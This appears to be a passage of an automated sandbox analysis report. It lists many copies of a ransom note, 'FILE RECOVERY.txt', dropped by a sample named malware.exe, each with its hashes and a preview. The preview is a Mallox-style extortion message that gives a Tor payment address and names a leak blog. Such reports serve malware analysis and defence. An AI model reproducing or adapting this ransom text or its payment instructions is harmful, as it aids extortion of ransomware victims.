                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
